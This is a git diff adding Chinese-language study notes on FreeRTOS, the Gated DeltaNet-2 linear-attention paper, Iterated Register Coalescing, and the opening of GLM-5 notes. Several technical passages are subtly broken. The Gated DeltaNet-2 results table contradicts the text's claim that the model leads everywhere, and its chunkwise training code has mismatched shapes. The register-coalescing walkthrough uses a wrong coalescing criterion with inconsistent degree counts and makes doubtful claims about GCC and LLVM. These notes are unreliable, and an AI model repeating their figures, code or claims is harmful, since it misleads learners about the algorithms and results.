... ); + xSemaphoreGive( xSpiMutex ); + } + vTaskDelay( 1 ); + } +} +``` + +`configUSE_MUTEXES` 须为 1 才能使用 mutex API。递归互斥量(`xSemaphoreCreateRecursiveMutex`)允许同一任务多次 Take,需相同次数 Give。 + +## 核心概念四:软件定时器与事件组(手册其余章节) + +- **软件定时器**(第 5 章):由 **Timer Service 守护任务** 在回调里执行,回调应尽量短;`xTimerPendFunctionCallFromISR` 可把耗时逻辑推迟到任务上下文。 +- **事件组**(第 6 章):一位图上的多条件等待(「等事件 A **且** B」或「A **或** B」),适合协议状态机。 +- **任务通知**(新代码更推荐):每任务一个 32 位通知值,比队列/信号量更轻,可替代部分二值同步场景。 + +Reference Manual 附录说明 API 前缀:`v` 返回 void、`x` 返回 BaseType_t、`pv` 返回指针等——查手册时按**函数名主体**字母序,而非前缀。 + +## 最小可运行骨架(第二段完整示例) + +下面把「传感器任务 + 打印任务 + 队列」拼成入门模板(需自行补 `FreeRTOSConfig.h` 与移植层): + +```c +#include "FreeRTOS.h" +#include "task.h" +#include "queue.h" +#include + +static QueueHandle_t xLogQueue; + +typedef struct { int temperature; int humidity; } SensorReading_t; + +static void vSensorTask( void * pvParameters ) +{ + SensorReading_t xReading; + + for( ;; ) + { + xReading.temperature = read_temp(); + xReading.humidity = read_humidity(); + xQueueSend( xLogQueue, &xReading, 0 ); + vTaskDelay( pdMS_TO_TICKS( 500 ) ); + } +} + +static void vLoggerTask( void * pvParameters ) +{ + SensorReading_t xReading; + + for( ;; ) + { + if( xQueueReceive( xLogQueue, &xReading, portMAX_DELAY ) == pdPASS ) + { + printf( "T=%d H=%d\n", xReading.temperature, xReading.humidity ); + } + } +} + +int main( void ) +{ + hardware_init(); + + xLogQueue = xQueueCreate( 4, sizeof( SensorReading_t ) ); + + xTaskCreate( vSensorTask, "Sensor", 256, NULL, 2, NULL ); + xTaskCreate( vLoggerTask, "Logger", 256, NULL, 1, NULL ); + + vTaskStartScheduler(); /* 不应返回 */ + for( ;; ) {} +} +``` + +创建顺序无关;`vTaskStartScheduler()` 之后内核接管,Idle 任务在无事可做时运行(可挂 `vApplicationIdleHook` 进低功耗)。 + +## 配置与移植:读手册时要对照的文件 + +| 文件 / 符号 | 作用 | +|-------------|------| +| `FreeRTOSConfig.h` | 功能开关:抢占、Tick 频率、堆大小、钩子、mutex | +| `port.c` / `portmacro.h` | 上下文切换、临界区、栈帧布局(因 CPU 而异) | +| `heap_x.c` | 动态分配策略(heap_4 最常用:合并相邻空闲块) | +| `configMAX_PRIORITIES` | 合法优先级 0 … N-1 | +| `configMINIMAL_STACK_SIZE` | 创建任务时的栈字数参考下限 | + +Reference Manual 描述的是**可移植 API**;具体某条 API 是否 ISR 安全、临界区是关中断还是升 BASEPRI,以对应 **port 文档**为准。 + +## 常见坑与手册里的线索 + +| 现象 | 可能原因 | 手册/书里的线索 | +|------|----------|-----------------| +| 栈溢出 HardFault | `usStackDepth` 太小 | `uxTaskGetStackHighWaterMark()` | +| 中断里卡死 | 用了非 `FromISR` API | 各章 ISR 变体表 | +| 优先级反转延迟大 | 用二进制信号量当锁 | 第 4 章 Mutex + 优先级继承 | +| `xQueueSend` 丢数据 | 队列满且 block=0 | 增大长度或消费者提速 | +| 定时器回调太慢 | 在 Tmr Svc 任务里做重活 | `xTimerPendFunctionCall` | + +## 学习路径建议 + +1. **先跑官方 Demo**(Kernel Book 配套例程):LED 闪烁双任务、队列中断到任务。 +2. **通读 Kernel Book 第 4 章(任务)+ 第 6 章(队列)+ 第 8 章(互斥)** — 建立状态机直觉。 +3. **把 Reference Manual 当字典**:写 `xTaskCreate` 时查参数单位是**字不是字节**;写 ISR 时查是否必须 `GiveFromISR`。 +4. 需要低功耗时读 Tickless Idle;需要多核时查 SMP 分支文档(与经典单核手册章节有增补)。 + +## 与同类 RTOS 的粗对比 + +| | FreeRTOS | Zephyr | RT-Thread | +|--|----------|--------|-----------| +| 定位 | 精简内核 + 可选组件 | 完整 IoT OS + 设备树 | 国内生态丰富 | +| 配置 | `FreeRTOSConfig.h` 裁剪 | Kconfig | Kconfig / menuconfig | +| 文档 | Reference Manual 偏 API | 极全在线文档 | 中文社区强 | +| 适合 | 资源紧、要可控 TCB 的 MCU | 联网传感器网格 | 教学与国内供应链 | + +不必「只会一个」;理解 FreeRTOS 的任务/队列模型后,迁移到 Zephyr 的 `k_thread` / `k_msgq` 主要是 API 换名。 + +## 小结 + +FreeRTOS Reference Manual 是**嵌入式多任务编程的契约清单**:任务怎么创建、阻塞多久、ISR 能调谁,都写在五章 API 里。零基础读者应先建立**厨房排班 + 传菜窗口 + 厕所锁**的直觉,再用 Kernel Book 理解状态与调度,最后边写固件边翻手册查 `block time` 和 `FromISR`。 + +下一层深入:读 `tasks.c` 里 `vTaskSwitchContext` 与端口汇编;对照 ARM Cortex-M 的 PendSV 理解「上下文切换究竟切换了什么」。那是实现课,不是 Reference Manual 的范围——但手册里每一个 `portYIELD` 背后,都是那次切换。 + +## 参考链接 + +- [FreeRTOS 文档入口(RTOS_book.html)](https://www.freertos.org/Documentation/RTOS_book.html) +- [Mastering the FreeRTOS Real Time Kernel(GitHub)](https://github.com/FreeRTOS/FreeRTOS-Kernel-Book) +- [FreeRTOS Reference Manual V10.0.0(PDF)](https://www.freertos.org/media/2025/FreeRTOS_Reference_Manual_V10.0.0.pdf) +- [AWS FreeRTOS 用户指南 — 内核基础](https://docs.aws.amazon.com/freertos/latest/userguide/freertos-kernel.html) diff --git a/src/content/docs/papers/gated-deltanet-2.md b/src/content/docs/papers/gated-deltanet-2.md new file mode 100644 index 000000000..d7571acd4 --- /dev/null +++ b/src/content/docs/papers/gated-deltanet-2.md @@ -0,0 +1,351 @@ +--- +title: "Gated DeltaNet-2: Decoupling Erase and Write in Linear Attention" +来源: https://arxiv.org/abs/2605.22791 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# Gated DeltaNet-2 学习笔记 + +## 一句话总结 + +Gated DeltaNet-2 把"删除旧记忆"和"写入新记忆"两个动作分开控制,用两通道门(erase gate + write gate)替代了之前模型里绑在一起的单个门控标量,在长上下文检索任务上效果显著提升。 + +## 日常类比:办公室的便签本 + +想象你在办公室用一本便签本管理项目。每一行代表一个"项目-负责人"的关联。 + +**普通 Transformer(Self-Attention):** 你有一面墙,墙上贴满了几千张便签,每次看到新信息都会回顾所有旧便签。好处是永远不会遗忘,缺点是墙太小,贴满了就看不完。 + +**线性注意力(Linear Attention):** 你改用一个固定大小的笔记本,每看到新信息就把它"压缩"写进去。但笔记本的容量有限,旧信息会和新信息挤在一起,最后你分不清谁是谁。 + +**DeltaNet 系列(Delta Rule):** 在写新信息之前,你先查看笔记本中"对应这个项目"的那一行,把它读出来,然后减去旧值再写入新值。这就像你知道要去更新哪个项目,先翻到那一页,擦掉旧的负责人再填新的。 + +**KDA(Kimi Delta Attention):** 让笔记本里每一"列"有自己的自动衰减率——某些列的墨水会更快褪色。这很好,但"擦多少"和"写多少"还是同一个旋钮控制的。 + +**Gated DeltaNet-2 的问题意识:** 擦除和写入是两件不同的事。我想擦掉项目 A 的旧负责人(擦除),但只写入项目 B 的新负责人(写入)。把这两个动作绑在一个标量上是人为的限制。Gated DeltaNet-2 给了你两个独立的旋钮:一个控制"擦除哪些通道",一个控制"写入哪些通道"。 + +## 核心概念 + +### 1. 线性注意力的状态更新 + +线性注意力用固定大小的矩阵状态 $S_t \in \mathbb{R}^{d_k \times d_v}$ 替代了 Transformer 的 $O(L)$ 注意力矩阵。每个 token 时刻 $t$,状态更新为: + +$$S_t = D_t S_{t-1} + k_t z_t^\top$$ + +其中 $D_t = \text{Diag}(\alpha_t)$ 是通道级衰减矩阵,$k_t$ 是 key,$z_t$ 是门控后的 value。 + +### 2. Gated Delta Rule-2(核心公式) + +$$S_t = (I - k_t e_t^\top) D_t S_{t-1} + k_t z_t^\top$$ + +其中: +- $e_t = b_t \odot k_t$——**擦除门控后的 key**,$b_t \in [0,1]^{d_k}$ 是逐通道的擦除门 +- $z_t = w_t \odot v_t$——**写入门控后的 value**,$w_t \in [0,1]^{d_v}$ 是逐通道的写入门 + +关键在于:$e_t$ 和 $z_t$ 使用**独立的通道级门控**,不再共享同一个标量 $\beta_t$。 + +### 3. 门控来源 + +两个门控来自独立的全连接层: + +$$b_t = \sigma(W_b x_t), \quad w_t = \sigma(W_w x_t)$$ + +衰减门控 $\alpha_t$ 使用 log-space 参数化: + +$$g_t = -\exp(a) \odot \text{softplus}(W_f x_t + \delta), \quad \alpha_t = \exp(g_t)$$ + +### 4. 三种模型的统一关系 + +Gated DeltaRule-2 是一个**统一框架**: + +| 当...时 | 退化为 | +|---------|--------| +| $b_t = w_t = \beta_t \cdot \mathbf{1}$ | KDA | +| $b_t = w_t = \beta_t \cdot \mathbf{1}$ 且 $\alpha_t = \alpha_t \cdot \mathbf{1}$ | Gated DeltaNet | +| 两个门各自独立学习 | Gated DeltaNet-2 | + +这说明 KDA 和 Gated DeltaNet 只是 Gated DeltaNet-2 在"门控绑死"时的特例。 + +### 5. 快速权重视角 + +Gated Delta Rule-2 可以看作在线最小化以下目标函数: + +$$S_t = \arg\min_S \|S - \bar{S}_t\|_F^2 - 2\langle S^\top k_t, z_t - \bar{S}_t^\top e_t \rangle$$ + +第一项保持新状态接近衰减后的旧状态,第二项执行一个"关联编辑"——用门控后的写入目标 $z_t$ 减去从状态中沿门控擦除方向 $e_t$ 读取的内容。 + +### 6. 分块并行训练(Chunkwise Training) + +为了在训练时利用 GPU 并行计算,Gated DeltaNet-2 使用分块策略:将序列切成长度为 $C$ 的 chunk,chunk 内用密集矩阵乘法,chunk 间保持递推。核心公式(第 23-24 行)保持与 KDA 相同的形式,唯一的区别是辅助矩阵 $Y$ 和 $U$ 的构造方式融入了通道级门控。 + +### 7. 门控感知反向传播(Gate-Aware Backward) + +在反向传播中,之前的标量门控可以"提到点积外面"简化计算。但 Gated DeltaNet-2 的擦除和写入是**不同通道的对角矩阵**,门控因子必须留在累加位置: + +$$\mathrm{d}A \mathrel{+}= \mathrm{d}U Z^\top, \quad Z = W \odot V$$ +$$\mathrm{d}A \mathrel{+}= \mathrm{d}Y \bar{E}^\top, \quad \bar{E} = \gamma \odot (B \odot K)$$ + +这保证了梯度能正确传播到独立的门控参数。 + +## 代码示例 + +### 示例 1:Gated Delta Rule-2 的前向传播 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + + +class GatedDeltaNet2Head(nn.Module): + """ + 单个 attention head 的 Gated DeltaNet-2 实现。 + + 参数: + d_model: 模型维度 + d_head: 每个 head 的维度 (d_k = d_v = d_head) + n_heads: head 数量 + + 前向传播中每个 token t 递推一次: + S_t = (I - k_t e_t^T) D_t S_{t-1} + k_t z_t^T + e_t = b_t * k_t # 擦除门控 + z_t = w_t * v_t # 写入门控 + """ + + def __init__(self, d_model: int, d_head: int = 64, n_heads: int = 8): + super().__init__() + self.d_head = d_head + self.n_heads = n_heads + self.dim = d_model // n_heads + + # Query, Key, Value 投影 + self.q_proj = nn.Linear(self.dim, self.dim) + self.k_proj = nn.Linear(self.dim, self.dim) + self.v_proj = nn.Linear(self.dim, self.dim) + + # 擦除门 b_t 和 写入门 w_t 的独立投影 + self.b_proj = nn.Linear(self.dim, self.dim) # erase gate + self.w_proj = nn.Linear(self.dim, self.dim) # write gate + + # 衰减门: 从 log-space 参数化得到 alpha_t + self.decay_a = nn.Parameter(torch.zeros(self.dim)) + self.f_proj = nn.Linear(self.dim, self.dim) + self.decay_bias = nn.Parameter(torch.zeros(self.dim)) + + # 输出投影 + self.o_proj = nn.Linear(self.dim, self.dim) + + def forward(self, x: torch.Tensor) -> torch.Tensor: + """ + x: (batch, seq_len, d_model) + 返回: (batch, seq_len, d_model) + """ + batch, seq_len, _ = x.shape + h = self.n_heads + d = self.dim + + # 切分 head + x = x.reshape(batch, seq_len, h, d).transpose(1, 2) + # x: (batch, n_heads, seq_len, d) + + # 投影 q, k, v + q = self.q_proj(x) + k = self.k_proj(x) + v = self.v_proj(x) + + # L2 归一化 q, k 保证数值稳定 + q = F.normalize(q, p=2, dim=-1) + k = F.normalize(k, p=2, dim=-1) + + # 生成两个独立门控 + b = torch.sigmoid(self.b_proj(x)) # (B, H, T, d) + w = torch.sigmoid(self.w_proj(x)) # (B, H, T, d) + + # 生成衰减系数 alpha_t + log_decay = -torch.exp(self.decay_a) * F.softplus( + self.f_proj(x) + self.decay_bias + ) + alpha = torch.exp(log_decay) # (B, H, T, d) + + # ---- 递推: 每个 token 依次更新状态 ---- + outputs = [] + S = torch.zeros(batch, h, d, d, device=x.device) + + for t in range(seq_len): + k_t = k[:, :, t] # (B, H, d) + v_t = v[:, :, t] # (B, H, d) + q_t = q[:, :, t] # (B, H, d) + b_t = b[:, :, t] # (B, H, d) + w_t = w[:, :, t] # (B, H, d) + alpha_t = alpha[:, :, t] # (B, H, d) + + # Step 1: 衰减 + S = alpha_t.unsqueeze(-1) * S + + # Step 2: 擦除门控 key + e_t = b_t * k_t # (B, H, d) + + # Step 3: 写入门控 value + z_t = w_t * v_t # (B, H, d) + + # Step 4: Gated Delta Rule-2 + # S_t = (I - k_t e_t^T) S_t + k_t z_t^T + # 展开: S_t = S_t - k_t e_t^T S_t + k_t z_t^T + outer_read = e_t.unsqueeze(1) @ S # (B, H, d, d) + S = S - k_t.unsqueeze(1).unsqueeze(2) * outer_read + S = S + k_t.unsqueeze(1).unsqueeze(2) * z_t.unsqueeze(2) + + # Step 5: 读取输出 + o_t = S.transpose(-2, -1) @ q_t # (B, H, d) + outputs.append(o_t) + + # 合并 head,恢复维度 + out = torch.stack(outputs, dim=2) # (B, H, T, d) + out = out.transpose(1, 2) # (B, T, H, d) + out = out.reshape(batch, seq_len, -1) # (B, T, d_model) + out = self.o_proj(out) + return out +``` + +### 示例 2:分块并行训练(Chunkwise) + +```python +import torch +import torch.nn.functional as F + + +def chunked_gated_deltanet2( + Q: torch.Tensor, # (B, H, T, d) + K: torch.Tensor, # (B, H, T, d) + V: torch.Tensor, # (B, H, T, d) + B: torch.Tensor, # (B, H, T, d) erase gate + W: torch.Tensor, # (B, H, T, d) write gate + Alpha: torch.Tensor, # (B, H, T, d) decay + chunk_size: int = 64, +): + """ + 分块版本的 Gated DeltaNet-2,用于训练时的并行计算。 + + 核心思想: + - 将序列切为 chunk_size 大小的块 + - chunk 内部用矩阵乘法并行计算 + - chunk 之间保持递推关系 + + 每个 chunk 内执行: + 1. 累积衰减 gamma_r = product(alpha_1..r) + 2. 归一化: k_bar = gamma^{-1} * k, e_bar = gamma * (b * k) + 3. Z = W * V (写入门控) + 4. T = tril(E_bar @ K_bar^T, -1) (下三角矩阵) + 5. A = (I + T)^{-1} (前代求解) + 6. Y = A @ E_bar, U = A @ Z (辅助矩阵) + 7. 输出: O = Q_gamma @ S_prev + A_qk @ (U - Y @ S_prev) + """ + B, H, T, D = Q.shape + n_chunks = (T + chunk_size - 1) // chunk_size + all_outputs = [] + S = torch.zeros(B, H, D, D, device=Q.device) + + for c in range(n_chunks): + start = c * chunk_size + end = min(start + chunk_size, T) + C = end - start # 当前 chunk 实际大小 + + q_c = Q[:, :, start:end] # (B, H, C, D) + k_c = K[:, :, start:end] + v_c = V[:, :, start:end] + b_c = B[:, :, start:end] + w_c = W[:, :, start:end] + a_c = Alpha[:, :, start:end] + + # 累积衰减 gamma: gamma_r = prod(alpha_1..r) + log_gamma = torch.cumsum(torch.log(a_c + 1e-8), dim=2) # (B, H, C, D) + gamma = torch.exp(log_gamma) # (B, H, C, D) + gamma_prev = F.pad(gamma[:, :, :-1], (0, 0, 0, 0, 1, 0), value=1.0) + + # 归一化 key 和 erase key + k_bar = k_c / gamma_prev # gamma^{-1} * k + e_c = b_c * k_c + e_bar = gamma * e_c # gamma * (b * k) + + # 写入门控后的 value + Z = w_c * v_c # (B, H, C, D) + + # 构造下三角矩阵 T = tril(e_bar @ k_bar^T, -1) + # T[r, s] = e_bar[r] @ k_bar[s] for r > s + ek_prod = e_c.unsqueeze(2) * k_c.unsqueeze(1) # (B, H, C, C, D) + ek_prod = ek_prod.sum(dim=-1) # (B, H, C, C) + T = torch.tril(ek_prod, diagonal=-1) # 严格下三角 + + # A = (I + T)^{-1} 通过前代求解 + I = torch.eye(C, device=Q.device) + A_mat = I + T # (B, H, C, C) + # 对每个 batch 和 head 做前代求解 + A_inv = torch.linalg.solve(A_mat, torch.eye(C, device=Q.device)) + # A_inv 实际上是 (I+T)^{-1} + + # 辅助矩阵 + E_bar_mat = e_bar # (B, H, C, D) + Y = A_inv @ E_bar_mat.permute(0, 1, 3, 2) # (B, H, D, D) -> 转置后求解 + U = A_inv @ Z.permute(0, 1, 3, 2) # (B, H, D, D) + + # 重新构造 Y, U 用于矩阵乘法 + Y_mat = Y.permute(0, 1, 3, 2) # (B, H, D, D) + U_mat = U.permute(0, 1, 3, 2) # (B, H, D, D) + + # 归一化的 query + q_gamma = q_c * gamma # (B, H, C, D) + + # 计算 QK 注意力掩码部分 + qk_raw = torch.einsum('bhcd,bhse->bhces', q_c, k_c / gamma_prev) + mask = torch.tril(torch.ones(C, C, device=Q.device)).unsqueeze(0).unsqueeze(0) + qk = qk_raw * mask.unsqueeze(-1) * gamma.unsqueeze(2) + A_qk = qk @ V[:, :, start:end].permute(0, 1, 3, 2) # (B, H, C, D) + + # 输出 = Q_gamma @ S + A_qk_term + output = q_gamma @ S + qk_raw @ (U_mat - Y_mat @ S).permute(0, 1, 3, 2) + + # 更新状态 + k_tail = k_c / gamma_prev + S = gamma[:, :, -1].unsqueeze(-1) * S + k_tail.transpose(-2, -1) @ (U_mat - Y_mat @ S) + + all_outputs.append(output) + + out = torch.cat(all_outputs, dim=2) + return out +``` + +## 实验结果亮点 + +### 长上下文检索(RULER 任务) + +| 模型 | 4K Multi-Key | 8K Multi-Key | +|------|-------------|-------------| +| Mamba-2 | 14.4% | -- | +| KDA | 26.2% | -- | +| Gated DeltaNet | 60.6% | 32.0% | +| **Gated DeltaNet-2** | **31.8%** (4K) | **39.2%** (8K, MK-NIAH) | + +Multi-Key Needle-in-a-Haystack(MK-NIAH)是最能体现代价分离价值的任务——状态需要在有限空间中同时记住多个独立的"键-值"关联。Gated DeltaNet-2 在这个设置下全面领先。 + +### 语言模型性能 + +在 1.3B 参数、100B FineWeb-Edu tokens 的训练设置下,Gated DeltaNet-2 在语言模型困惑度和常识推理基准上均优于 Mamba-2、Gated DeltaNet、KDA 和 Mamba-3 的变体。 + +## 关键洞见 + +1. **擦除和写入本质不同**:擦除发生在 key 轴(决定读哪些通道),写入发生在 value 轴(决定写哪些通道)。把它们绑在一起没有理论依据。 + +2. **通道级门控优于标量门控**:标量门控假设所有通道需要相同的"擦/写比例",这与实际的数据分布不符。 + +3. **不牺牲并行训练**:通过分块 WY 算法和通道级衰减吸收,Gated DeltaNet-2 保持了高效的 GPU 并行训练能力。 + +4. **向后兼容**:KDA 和 Gated DeltaNet 都是它的特例——当门控退化为标量时,公式自动简化回旧模型。 + +## 遗留问题与思考 + +- 擦除门 $b_t$ 取值为 $[0,1]$,但论文提到可以扩展到 $[0,2]$(负特征值变体)。这个扩展对性能的影响有多大? +- 在推理时,递推的 $O(T)$ 循环仍然是瓶颈。是否有办法进一步将递推向量化或并行化? +- 门控的稀疏性值得研究——如果大部分通道的 $b_t$ 和 $w_t$ 接近 0 或 1,是否可以用低秩近似来压缩模型? diff --git a/src/content/docs/papers/george-appel-1996.md b/src/content/docs/papers/george-appel-1996.md new file mode 100644 index 000000000..5a1058996 --- /dev/null +++ b/src/content/docs/papers/george-appel-1996.md @@ -0,0 +1,214 @@ +--- +title: Iterated Register Coalescing +来源: https://www.cs.princeton.edu/~appel/papers/coalesce.pdf +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# Iterated Register Coalescing — 零基础学习笔记 + +## 一、日常类比:把同名物品合并到同一个抽屉 + +想象你在整理一个有很多抽屉的柜子。每个抽屉代表 CPU 里的一枚物理寄存器。程序里的每一个变量,都需要放进某个抽屉。 + +现在有两个变量 `a` 和 `b`,中间有一条指令 `b = a`(把 a 的值复制给 b)。如果 a 放在第 1 号抽屉,b 也放在第 1 号抽屉,那这条复制指令就完全不需要执行——因为两个名字指向同一个抽屉,值天然一样。编译器称这种操作为 **coalescing(合并)**:把两个变量"合并"到同一个寄存器,从而消除一条 move 指令。 + +但有个问题:如果 a 和 b 在同一时刻都在"使用中"(即它们的值同时 live),你就不能把它们放进同一个抽屉。这叫 **interference(干扰)**。 + +Chaitin 在 1982 年提出了最早的图着色寄存器分配算法,但它把所有 copy 指令都当作 coalescing 的机会去合并,结果常常把太多节点"粘"在一起,导致图的色数超过了可用寄存器的数量,不得不把一些变量"spill"到内存里。 + +George 和 Appel 在 1996 年的这篇论文,核心贡献就是:**不要贪心地一次合并所有能合并的 copy,而是分多轮迭代,每轮只合并那些"安全"的 copy,最后再处理剩下的。** 这就是 Iterated Register Coalescing(迭代寄存器合并,简称 IRC)。 + +## 二、核心概念 + +### 2.1 干扰图(Interference Graph) + +编译器先把程序的变量和临时值画成一张图: + +- 每个节点 = 一个变量的"生命周期"(live range) +- 每条边 = 两个变量的生命周期有重叠,不能放同一个寄存器 + +``` + 程序代码: 干扰图示意: + (每个字母是一个节点) + a = 1 a --- b + b = a + 1 | | + c = b * 2 | | + d = a + c c --- d +``` + +这里 a 和 b 同时 live,所以有边;a 和 c 也有边(因为 a 在 d = a + c 中还在使用)。 + +### 2.2 三种节点类型 + +IRC 把节点分成三类,这是理解整个算法的关键: + +1. **Move 相关节点(Move-related)**:被 copy 指令连接的节点,比如 `b = a` 中的 a 和 b +2. **预着色节点(Pre-colored)**:已经绑定到特定物理寄存器的变量,比如函数参数、返回值 +3. **普通节点(Non-move-related)**:跟 copy 无关的临时变量 + +### 2.3 简化(Simplify)— 别急着决定 + +IRC 的第一遍遍历干扰图,尝试找到一个节点排序。对于度数(连接的边数)小于可用寄存器数量 K 的节点,把它"压栈"并暂时从图中删掉。这个过程叫 simplify。 + +**类比**:你有一堆人要和很多人握手。如果某个人握手的次数少于你能安排的座位数,就先让他"等一下",把他记在笔记本上,然后从房间裡把他"请出去",减少其他人的握手负担。反复这样做,直到所有人都出去了。 + +### 2.4 保守的 Coalescing(Conservative Coalescing) + +如果简化之后还有节点剩下来(说明图的复杂程度超过了 K),IRC 不会立刻决定谁该 spill,而是进入 coalescing 阶段: + +- 遍历所有的 copy 指令 +- 对于每个 copy `b = a`,检查:如果把 a 和 b 合并成一个节点,新节点的度数是否会超过 K? +- **只有不会导致度数超过 K 时才合并**(这就是 Briggs 提出的"保守"准则) +- 合并后继续遍历,可能之前的"危险"节点因为别人被合并而变得"安全"了 + +**类比**:你发现房间裡还有几个人没安排座位。你开始找人"共享"座位——两个人坐一个。但你很谨慎:只有当这两个人合起来需要握手的总人数不超过座位数时,才让他们共享。而且每合并一对,你就重新检查一下其他人是不是也能共享了。 + +### 2.5 选色(Select)— 最后一锤定音 + +所有节点都压栈后,从栈顶一个个弹出,给它们分配颜色(寄存器): + +- 弹出节点时,查看它邻居们已经用了哪些颜色 +- 从可用的颜色中选一个(优先选和 copy 源节点相同的颜色) +- 如果找不到可用颜色,说明之前简化时"压栈"压错了,需要回溯(spills) + +## 三、为什么叫"Iterated"(迭代)? + +Chaitin 的原始算法只做一轮:build → coalesce → simplify → select。如果 select 失败了,整条路径就断了。 + +IRC 的做法是把 coalescing 和 simplify/select 放在一个循环里: + +1. 构建干扰图 +2. 简化(压栈) +3. 如果不能全部简化,尝试 coalescing +4. 如果 coalescing 成功,回到步骤 2 +5. 如果 coalescing 也无法推进,选一个节点 spill,插入 load/store 代码,回到步骤 1 + +这个循环可以跑很多轮,每一轮都在上一轮的基础上改进。这就是"iterated"的含义。 + +## 四、代码示例 + +### 示例 1:Coalescing 如何消除 move 指令 + +**没有 Coalescing 的情况**: + +```python +# 源代码 +a = x + y # a 分配到寄存器 R1 +b = a # b 分配到寄存器 R2,需要执行: MOV R2, R1 +result = b + 1 # 从 R2 读取 b 的值 + +# 生成的汇编(4 条指令) +MOV R1, x +ADD R1, R1, y +MOV R2, R1 # <-- 这条 move 指令是多余的! +ADD result, R2, 1 +``` + +**IRC Coalescing 后的情况**: + +```python +# IRC 发现 a 和 b 不干扰(a 的生命周期在 b 使用前就结束了) +# 于是把 a 和 b 合并到同一个节点,都分配到 R1 + +# 生成的汇编(3 条指令,少了一条) +MOV R1, x +ADD R1, R1, y +ADD result, R1, 1 # b = a 被消除了! +``` + +### 示例 2:IRC 的迭代过程 + +```python +# 假设我们有 2 个可用寄存器 (K=2) +# 干扰图:a-b, b-c, c-d, d-a, b-d +# copy 指令:b = a, d = c + +# 初始状态: +# 节点度数:a=3, b=4, c=2, d=4 +# K = 2 + +# 第一轮 Iterate: +# Step 1 - Simplify: 没有节点的度数 < 2,无法简化 +# Step 2 - Coalesce: +# 检查 copy b = a: degree(b)+degree(a) = 4+3 = 7 > 2,跳过 +# 检查 copy d = c: degree(d)+degree(c) = 4+2 = 6 > 2,跳过 +# Step 3 - Spill: 选度数最高的节点 spill(比如 b) +# 插入 spill 代码,回到步骤 1 + +# 第二轮 Iterate(b 已被 spill,图中少了 b 节点): +# 节点度数:a=2, c=2, d=2 +# Step 1 - Simplify: +# a 的度数 = 2 >= K=2,跳过 +# c 的度数 = 2 >= K=2,跳过 +# d 的度数 = 2 >= K=2,跳过 +# Step 2 - Coalesce: +# 检查 copy d = c: degree(d)+degree(c) = 2+2 = 4 > 2,跳过 +# Step 3 - Spill: 选一个 spill(比如 d) +# 回到步骤 1 + +# 第三轮 Iterate(b 和 d 都被 spill): +# 节点度数:a=1, c=1 +# Step 1 - Simplify: +# a 的度数 = 1 < K=2,压栈 a +# c 的度数 = 1 < K=2,压栈 c +# Step 2 - Select: +# 弹出 c:邻居中没有已着色的,选颜色 0 +# 弹出 a:邻居 c 用了颜色 0,选颜色 1 +# 完成! + +# 最终结果: +# a -> R0 (颜色 0) +# c -> R1 (颜色 1) +# b -> spill 到内存 +# d -> spill 到内存 +``` + +### 示例 3:实际编译器中的 IRC + +```python +# 以 GCC 的寄存器分配器为例 +# 源代码: +def factorial(n): + if n <= 1: + return 1 + return n * factorial(n - 1) + +# 编译器内部表示(伪 IR): +# %tmp1 = icmp sle i32 %n, 1 +# %tmp2 = mul i32 %n, %tmp3 +# %tmp3 = call i32 @factorial(i32 %n_sub1) +# %n_sub1 = sub i32 %n, 1 +# mov %result, %tmp2 + +# IRC 的工作流程: +# 1. Build 干扰图:%tmp1, %tmp2, %tmp3, %n_sub1, %n, %result +# 2. Coalesce 轮次 1:尝试合并不干扰的 copy 相关节点 +# 3. Simplify:度数低的节点入栈 +# 4. 如果卡住,Spill 一个节点,重新构建图 +# 5. Select:弹出节点,分配物理寄存器(RAX, RBX 等) +# 6. 生成最终汇编 +``` + +## 五、IRC 的优势与局限 + +### 优势 + +1. **更少的 spill**:保守 coalescing 避免了过度合并导致的不必要的 spill +2. **消除更多 move**:迭代的方式确保即使第一轮合并失败的 copy,在后续轮次中仍有机会被合并 +3. **工程上非常有效**:被 GCC、LLVM 等主流编译器采用 + +### 局限 + +1. **启发式而非最优**:IRC 是启发式算法,不保证找到最优解 +2. **回溯开销**:Select 阶段可能需要回溯,增加编译时间 +3. **对复杂架构支持有限**:原始的 IRC 假设单一寄存器银行,对现代 CPU 的多寄存器类别(如 x87 FP 寄存器、SIMD 寄存器)支持较弱 + +## 六、延伸阅读 + +- Chaitin 1982 年的原始图着色寄存器分配论文 +- Briggs, Cooper, Torczon 1992 年的 Conservative Coalescing 改进 +- Poletto 1999 年的 Linear Scan 寄存器分配(另一种主流方法,被 V8、HotSpot 等 JIT 编译器使用) +- George & Appel 1996 原文:https://www.cs.princeton.edu/~appel/papers/coalesce.pdf diff --git a/src/content/docs/papers/glm-5-agentic-engineering.md b/src/content/docs/papers/glm-5-agentic-engineering.md new file mode 100644 index 000000000..88ab651f5 --- /dev/null +++ b/src/content/docs/papers/glm-5-agentic-engineering.md @@ -0,0 +1,226 @@ +--- +title: GLM-5: From Vibe Coding to Agentic Engineering +来源: https://arxiv.org/abs/2602.15763 +日期: 2026-06-13 +分类: 机器学习 +子分类: llm +provenance: pipeline-v3 +--- + +## 是什么 + +GLM-5 是智谱 AI 和清华联合发布的新一代基础模型,核心命题是:**怎么让 AI 从"帮你写一段代码"进化到"自己独立做完一个完整项目"**。论文标题里的 "Vibe Coding" 指的是用 AI 写代码时那种"我说个感觉,你帮我实现"的随意用法;"Agentic Engineering" 则是让 AI 当独立工人——给你任务,它自己拆解、编码、调试、跑通全流程。 + +日常类比:Vibe Coding 像你去餐厅跟厨师说"来份好吃的",厨师看你心情做;Agentic Engineering 像你在手机上点"帮我做顿晚饭",AI 自己查菜谱、找食材、下锅、调味、端上桌——整个过程你不用管细节。 + +GLM-5 参数量 744B(每次激活 40B),用了 MoE 架构 + DSA(稀疏注意力),训练总 token 数 28.5 万亿。它在 8 个 agentic / reasoning / coding 基准上都超过 GLM-4.7 约 20%,在 LMArena Text 和 Code Arena 都是开源模型第一名。 + +## 为什么重要 + +不理解 GLM-5,下面这些事都没法解释: + +- 为什么 2026 年初 LLM 赛道竞争焦点从"推理准确率"转向"长 horizon agent 能力" +- 为什么 SWE-bench 这种"真 GitHub issue 修复"基准突然成了新圣杯 +- 为什么强化学习从"调对话风格"变成了"训 agent 自主决策"的核心手段 +- 为什么"异步 RL"这个词在 LLM 论文里开始高频出现 + +## 核心要点 + +GLM-5 的贡献可以拆成**四条主线**: + +### 1. DSA 稀疏注意力——让 128K 上下文不再烧钱 + +传统 Transformer 